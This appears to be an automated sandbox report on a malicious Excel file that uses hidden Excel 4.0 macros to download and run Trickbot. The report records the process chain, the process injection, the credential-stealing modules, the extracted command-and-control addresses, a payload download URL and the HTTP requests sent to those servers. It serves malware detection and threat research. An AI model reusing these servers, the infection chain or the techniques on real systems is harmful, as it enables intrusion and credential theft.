Loading ...

Play interactive tourEdit tour

Analysis Report SecuriteInfo.com.Exploit.Siggen3.10350.15803.23095

Overview

General Information

Sample Name:SecuriteInfo.com.Exploit.Siggen3.10350.15803.23095 (renamed file extension from 23095 to xls)
Analysis ID:355598
MD5:35ca616a3d685b7d1708eb901841879c
SHA1:b5073681d9bc3885987ee74ec1325d96152c46f0
SHA256:b9e1d6f26440468f142642382047529f94536f9601f4ffa70917c1b3ccac69e7

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Trickbot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Document exploit detected (drops PE files)
Found malicious Excel 4.0 Macro
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Trickbot
Yara detected Trickbot
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Hijacks the control flow in another process
May check the online IP address of the machine
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious Svchost Process
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Connects to several IPs in different countries
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2316 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2524 cmdline: rundll32 ..\BASE.BABAA,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
      • rundll32.exe (PID: 2480 cmdline: rundll32 ..\BASE.BABAA,DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
        • wermgr.exe (PID: 2492 cmdline: C:\Windows\system32\wermgr.exe MD5: 41DF7355A5A907E2C1D7804EC028965D)
        • wermgr.exe (PID: 2408 cmdline: C:\Windows\system32\wermgr.exe MD5: 41DF7355A5A907E2C1D7804EC028965D)
          • svchost.exe (PID: 2296 cmdline: C:\Windows\system32\svchost.exe MD5: C78655BC80301D76ED4FEF1C1EA40A7D)
  • taskeng.exe (PID: 1544 cmdline: taskeng.exe {DA6299CA-95CA-4E9D-8945-2CC05321254C} S-1-5-18:NT AUTHORITY\System:Service: MD5: 65EA57712340C09B1B0C427B4848AE05)
    • rundll32.exe (PID: 2284 cmdline: C:\Windows\system32\rundll32.EXE 'C:\Users\user\AppData\Roaming\QNetMonitor7737977537\rpBASEtx.rrd',DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

Threatname: Trickbot

{"gtag": "rob60", "C2 list": ["116.68.162.92:443", "190.239.34.181:443", "154.0.134.130:443", "187.95.136.38:443", "123.231.180.130:443", "109.69.4.201:443", "45.184.189.34:443", "193.8.194.96:443"], "modules": ["pwgrab", "mcconf"]}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
SecuriteInfo.com.Exploit.Siggen3.10350.15803.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x26ca2:$s1: Excel
  • 0x27d0a:$s1: Excel
  • 0x35b4:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.2094061002.0000000000180000.00000040.00000001.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
    00000004.00000003.2089754481.00000000006C4000.00000004.00000001.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
      00000004.00000003.2089764139.00000000006C4000.00000004.00000001.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
        00000004.00000002.2094284509.0000000000690000.00000004.00000020.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
          00000004.00000002.2094761896.0000000002198000.00000004.00000001.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
            Click to see the 1 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.2.rundll32.exe.180000.0.raw.unpackJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
              4.2.rundll32.exe.180000.0.unpackJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security

                Sigma Overview

                System Summary:

                barindex
                Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
                Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\BASE.BABAA,DllRegisterServer, CommandLine: rundll32 ..\BASE.BABAA,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2316, ProcessCommandLine: rundll32 ..\BASE.BABAA,DllRegisterServer, ProcessId: 2524
                Sigma detected: Suspicious Svchost ProcessShow sources
                Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\system32\svchost.exe, CommandLine: C:\Windows\system32\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\system32\wermgr.exe, ParentImage: C:\Windows\System32\wermgr.exe, ParentProcessId: 2408, ProcessCommandLine: C:\Windows\system32\svchost.exe, ProcessId: 2296

                Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Antivirus detection for URL or domainShow sources
                Source: http://www.chipmania.it/mails/open.phpAvira URL Cloud: Label: malware
                Found malware configurationShow sources
                Source: wermgr.exe.2408.6.memstrMalware Configuration Extractor: Trickbot {"gtag": "rob60", "C2 list": ["116.68.162.92:443", "190.239.34.181:443", "154.0.134.130:443", "187.95.136.38:443", "123.231.180.130:443", "109.69.4.201:443", "45.184.189.34:443", "193.8.194.96:443"], "modules": ["pwgrab", "mcconf"]}
                Multi AV Scanner detection for submitted fileShow sources
                Source: SecuriteInfo.com.Exploit.Siggen3.10350.15803.xlsVirustotal: Detection: 11%Perma Link
                Source: SecuriteInfo.com.Exploit.Siggen3.10350.15803.xlsReversingLabs: Detection: 27%
                Yara detected TrickbotShow sources
                Source: Yara matchFile source: Process Memory Space: wermgr.exe PID: 2408, type: MEMORY
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0007BCA0 CryptAcquireContextW,
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_000000018008B68C CryptUnprotectData,

                Compliance:

                barindex
                Uses insecure TLS / SSL version for HTTPS connectionShow sources
                Source: unknownHTTPS traffic detected: 193.8.194.96:443 -> 192.168.2.22:49170 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 193.8.194.96:443 -> 192.168.2.22:49173 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 193.8.194.96:443 -> 192.168.2.22:49175 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 193.8.194.96:443 -> 192.168.2.22:49177 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 193.8.194.96:443 -> 192.168.2.22:49178 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 193.8.194.96:443 -> 192.168.2.22:49179 version: TLS 1.0
                Uses new MSVCR DllsShow sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Binary contains paths to debug symbolsShow sources
                Source: Binary string: F:\projects\cryptor_beta\Bin\Crypter\CrypterDllReleaseNoLogs\Win32\Crypter.pdb source: rundll32.exe, 00000004.00000002.2095142044.000000006E169000.00000002.00020000.sdmp
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00061290 FindFirstFileW,FindNextFileW,
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000646F0 FindFirstFileW,FindNextFileW,
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0007FBB0 FindFirstFileW,SleepEx,FindNextFileW,

                Software Vulnerabilities:

                barindex
                Document exploit detected (drops PE files)Show sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: 10[1].jjkes.0.drJump to dropped file
                Document exploit detected (UrlDownloadToFile)Show sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
                Document exploit detected (process start blacklist hit)Show sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
                Source: excel.exeMemory has grown: Private usage: 4MB later: 47MB
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then cmp byte ptr [ecx+edx+01h], 00000000h
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then movzx ecx, word ptr [eax+02h]
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then mov ecx, 00004E20h
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then movzx edx, word ptr [eax]
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then inc dword ptr [esp+40h]
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then inc ecx
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec ecx
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then inc esp
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then movzx eax, byte ptr [ebx]
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then inc esp
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then inc edx
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then movzx ebx, word ptr [eax]
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then mov ebx, edx
                Source: global trafficDNS query: name: www.chipmania.it
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 94.140.114.136:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.81.0.78:80

                Networking:

                barindex
                Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                Source: TrafficSnort IDS: 2404348 ET CNC Feodo Tracker Reported CnC Server TCP group 25 192.168.2.22:49166 -> 94.140.114.136:443
                Source: TrafficSnort IDS: 2404320 ET CNC Feodo Tracker Reported CnC Server TCP group 11 192.168.2.22:49170 -> 193.8.194.96:443
                Source: TrafficSnort IDS: 2021013 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC) 193.8.194.96:443 -> 192.168.2.22:49170
                Source: TrafficSnort IDS: 2021013 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC) 193.8.194.96:443 -> 192.168.2.22:49173
                Source: TrafficSnort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.22:49174 -> 185.109.54.99:447
                Source: TrafficSnort IDS: 2021013 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC) 193.8.194.96:443 -> 192.168.2.22:49175
                Source: TrafficSnort IDS: 2021013 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC) 193.8.194.96:443 -> 192.168.2.22:49177
                Source: TrafficSnort IDS: 2021013 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC) 193.8.194.96:443 -> 192.168.2.22:49178
                Source: TrafficSnort IDS: 2021013 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC) 193.8.194.96:443 -> 192.168.2.22:49179
                C2 URLs / IPs found in malware configurationShow sources
                Source: Malware configuration extractorIPs: 116.68.162.92:443
                Source: Malware configuration extractorIPs: 190.239.34.181:443
                Source: Malware configuration extractorIPs: 154.0.134.130:443
                Source: Malware configuration extractorIPs: 187.95.136.38:443
                Source: Malware configuration extractorIPs: 123.231.180.130:443
                Source: Malware configuration extractorIPs: 109.69.4.201:443
                Source: Malware configuration extractorIPs: 45.184.189.34:443
                Source: Malware configuration extractorIPs: 193.8.194.96:443
                May check the online IP address of the machineShow sources
                Source: unknownDNS query: name: wtfismyip.com
                Source: unknownDNS query: name: wtfismyip.com
                Source: unknownDNS query: name: wtfismyip.com
                Source: unknownDNS query: name: wtfismyip.com
                Source: unknownNetwork traffic detected: IP country count 11
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.109.54.99:447
                Source: Joe Sandbox ViewIP Address: 185.81.0.78 185.81.0.78
                Source: Joe Sandbox ViewIP Address: 193.8.194.96 193.8.194.96
                Source: Joe Sandbox ViewASN Name: LINTASARTA-AS-APNetworkAccessProviderandInternetServic LINTASARTA-AS-APNetworkAccessProviderandInternetServic
                Source: Joe Sandbox ViewASN Name: TelefonicadelPeruSAAPE TelefonicadelPeruSAAPE
                Source: Joe Sandbox ViewJA3 fingerprint: 8c4a22651d328568ec66382a84fc505f
                Source: global trafficHTTP traffic detected: GET /mails/open.php HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.chipmania.itConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/83/ HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=---------FNVPIRVIEKQTDGGIConnection: CloseUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 116.68.162.92:443Content-Length: 282Cache-Control: no-cache
                Source: unknownHTTPS traffic detected: 193.8.194.96:443 -> 192.168.2.22:49170 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 193.8.194.96:443 -> 192.168.2.22:49173 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 193.8.194.96:443 -> 192.168.2.22:49175 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 193.8.194.96:443 -> 192.168.2.22:49177 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 193.8.194.96:443 -> 192.168.2.22:49178 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 193.8.194.96:443 -> 192.168.2.22:49179 version: TLS 1.0
                Source: unknownTCP traffic detected without corresponding DNS query: 94.140.114.136
                Source: unknownTCP traffic detected without corresponding DNS query: 94.140.114.136
                Source: unknownTCP traffic detected without corresponding DNS query: 94.140.114.136
                Source: unknownTCP traffic detected without corresponding DNS query: 94.140.114.136
                Source: unknownTCP traffic detected without corresponding DNS query: 94.140.114.136
                Source: unknownTCP traffic detected without corresponding DNS query: 94.140.114.136
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.249.156
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.249.156
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.249.156
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.249.156
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.249.156
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.249.156
                Source: unknownTCP traffic detected without corresponding DNS query: 193.8.194.96
                Source: unknownTCP traffic detected without corresponding DNS query: 193.8.194.96
                Source: unknownTCP traffic detected without corresponding DNS query: 193.8.194.96
                Source: unknownTCP traffic detected without corresponding DNS query: 193.8.194.96
                Source: unknownTCP traffic detected without corresponding DNS query: 193.8.194.96
                Source: unknownTCP traffic detected without corresponding DNS query: 193.8.194.96
                Source: unknownTCP traffic detected without corresponding DNS query: 193.8.194.96
                Source: unknownTCP traffic detected without corresponding DNS query: 193.8.194.96
                Source: unknownTCP traffic detected without corresponding DNS query: 193.8.194.96
                Source: unknownTCP traffic detected without corresponding DNS query: 193.8.194.96
                Source: unknownTCP traffic detected without corresponding DNS query: 193.8.194.96
                Source: unknownTCP traffic detected without corresponding DNS query: 193.8.194.96
                Source: unknownTCP traffic detected without corresponding DNS query: 193.8.194.96
                Source: unknownTCP traffic detected without corresponding DNS query: 193.8.194.96
                Source: unknownTCP traffic detected without corresponding DNS query: 193.8.194.96
                Source: unknownTCP traffic detected without corresponding DNS query: 193.8.194.96
                Source: unknownTCP traffic detected without corresponding DNS query: 193.8.194.96
                Source: unknownTCP traffic detected without corresponding DNS query: 193.8.194.96
                Source: unknownTCP traffic detected without corresponding DNS query: 193.8.194.96
                Source: unknownTCP traffic detected without corresponding DNS query: 193.8.194.96
                Source: unknownTCP traffic detected without corresponding DNS query: 193.8.194.96
                Source: unknownTCP traffic detected without corresponding DNS query: 193.8.194.96
                Source: unknownTCP traffic detected without corresponding DNS query: 193.8.194.96
                Source: unknownTCP traffic detected without corresponding DNS query: 185.109.54.99
                Source: unknownTCP traffic detected without corresponding DNS query: 185.109.54.99
                Source: unknownTCP traffic detected without corresponding DNS query: 185.109.54.99
                Source: unknownTCP traffic detected without corresponding DNS query: 193.8.194.96
                Source: unknownTCP traffic detected without corresponding DNS query: 185.109.54.99
                Source: unknownTCP traffic detected without corresponding DNS query: 185.109.54.99
                Source: unknownTCP traffic detected without corresponding DNS query: 185.109.54.99
                Source: unknownTCP traffic detected without corresponding DNS query: 185.109.54.99
                Source: unknownTCP traffic detected without corresponding DNS query: 185.109.54.99
                Source: unknownTCP traffic detected without corresponding DNS query: 185.109.54.99
                Source: unknownTCP traffic detected without corresponding DNS query: 185.109.54.99
                Source: unknownTCP traffic detected without corresponding DNS query: 185.109.54.99
                Source: unknownTCP traffic detected without corresponding DNS query: 185.109.54.99
                Source: unknownTCP traffic detected without corresponding DNS query: 185.109.54.99
                Source: unknownTCP traffic detected without corresponding DNS query: 185.109.54.99
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZJump to behavior
                Source: global trafficHTTP traffic detected: GET /mails/open.php HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.chipmania.itConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /text HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.71.0Host: wtfismyip.com
                Source: rundll32.exe, 00000003.00000002.2095309685.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094325254.0000000001D70000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2362993370.0000000033B30000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2357183823.0000000000850000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                Source: unknownDNS traffic detected: queries for: www.chipmania.it
                Source: unknownHTTP traffic detected: POST /rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/83/ HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=---------FNVPIRVIEKQTDGGIConnection: CloseUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 116.68.162.92:443Content-Length: 282Cache-Control: no-cache
                Source: wermgr.exe, 00000006.00000002.2357365100.0000000000423000.00000004.00000020.sdmpString found in binary or memory: Https://193.8.194.96/rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/1/bnfhZJn91PhwAc8eqCIkI2c
                Source: wermgr.exe, 00000006.00000002.2362023114.000000003205D000.00000004.00000040.sdmpString found in binary or memory: http://109.69.4.201:443
                Source: wermgr.exe, 00000006.00000002.2362068163.0000000032D8C000.00000004.00000040.sdmp, wermgr.exe, 00000006.00000002.2362023114.000000003205D000.00000004.00000040.sdmpString found in binary or memory: http://116.68.162.92:443
                Source: wermgr.exe, 00000006.00000002.2362023114.000000003205D000.00000004.00000040.sdmpString found in binary or memory: http://123.231.180.130:443
                Source: wermgr.exe, 00000006.00000002.2362023114.000000003205D000.00000004.00000040.sdmpString found in binary or memory: http://154.0.134.130:443
                Source: wermgr.exe, 00000006.00000002.2362023114.000000003205D000.00000004.00000040.sdmpString found in binary or memory: http://187.95.136.38:443
                Source: wermgr.exe, 00000006.00000002.2362023114.000000003205D000.00000004.00000040.sdmpString found in binary or memory: http://190.239.34.181:443
                Source: wermgr.exe, 00000006.00000002.2362023114.000000003205D000.00000004.00000040.sdmpString found in binary or memory: http://45.184.189.34:443
                Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                Source: wermgr.exe, 00000006.00000003.2299229842.0000000033367000.00000004.00000001.sdmpString found in binary or memory: http://crl.use
                Source: wermgr.exe, 00000006.00000002.2357365100.0000000000423000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enl
                Source: rundll32.exe, 00000003.00000002.2095309685.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094325254.0000000001D70000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2362993370.0000000033B30000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2357183823.0000000000850000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
                Source: rundll32.exe, 00000003.00000002.2095309685.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094325254.0000000001D70000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2362993370.0000000033B30000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2357183823.0000000000850000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
                Source: rundll32.exe, 00000003.00000002.2095488522.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094574045.0000000001F57000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2363189685.0000000033D17000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2357387753.0000000000A37000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
                Source: rundll32.exe, 00000003.00000002.2095488522.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094574045.0000000001F57000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2363189685.0000000033D17000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2357387753.0000000000A37000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
                Source: wermgr.exe, 00000006.00000003.2299229842.0000000033367000.00000004.00000001.sdmpString found in binary or memory: http://logo.veri
                Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net03
                Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                Source: wermgr.exe, 00000006.00000002.2362599901.0000000033740000.00000002.00000001.sdmp, taskeng.exe, 00000008.00000002.2357215363.0000000000800000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                Source: wermgr.exe, 00000006.00000002.2363434960.0000000034070000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
                Source: rundll32.exe, 00000003.00000002.2095488522.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094574045.0000000001F57000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2363189685.0000000033D17000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2357387753.0000000000A37000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
                Source: rundll32.exe, 00000003.00000002.2095488522.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094574045.0000000001F57000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2363189685.0000000033D17000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2357387753.0000000000A37000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
                Source: wermgr.exe, 00000006.00000002.2362599901.0000000033740000.00000002.00000001.sdmp, taskeng.exe, 00000008.00000002.2357215363.0000000000800000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
